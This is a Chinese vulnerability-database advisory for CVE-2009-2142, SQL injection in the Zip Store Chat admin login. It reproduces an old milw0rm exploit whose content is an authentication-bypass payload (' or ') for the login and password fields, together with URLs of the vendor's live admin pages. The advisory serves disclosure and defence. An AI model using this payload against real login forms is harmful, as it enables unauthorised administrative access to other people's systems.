Zip Store Chat admin/index.asp多个SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117950 漏洞类型 SQL注入
发布时间 2009-06-12 更新时间 2009-06-12
CVE编号 CVE-2009-2142 CNNVD-ID CNNVD-200906-338
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/8935
https://www.securityfocus.com/bid/44074
https://cxsecurity.com/issue/WLB-2009060164
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200906-338
|漏洞详情
ZipStoreChat4.0版本和5.0版本的admin/index.asp中存在多个SQL注入漏洞。远程攻击者可以借助(1)login以及(2)senha参数,执行任意SQL指令。
|漏洞EXP
\\\|///
      \\  - -  //
       (  @ @ )
----oOOo--(_)-oOOo---------------------------
@~~=Author   : ByALBAYX

@~~=Website  : WWW.C4TEAM.ORG
---------------Ooooo-------------------------
               (   )
      ooooO     ) /
      (   )    (_/
       \ (
        \_)
@~~=======================================~~@
@~~=Script   : Zip Store Chat 4.0 + 5.0

@~~=S.Site   : http://zipstore.com.br
@~~=======================================~~@

@~~=Vul

@~~=http://c4team.org/ [Yol] /admin/index.asp

Login: ' or '

Senha: ' or '

@~~=Demo    : 

@~~=http://zipstore.com.br/chat/4.0/admin/index.asp

@~~=http://zipstore.com.br/chat/5.0/admin/index.asp
@~~=======================================~~@

@~~=:/

# milw0rm.com [2009-06-12]
|参考资料

来源:VUPEN
名称:ADV-2009-1581
链接:http://www.vupen.com/english/advisories/2009/1581
来源:MILW0RM
名称:8935
链接:http://www.milw0rm.com/exploits/8935
来源:SECUNIA
名称:35417
链接:http://secunia.com/advisories/35417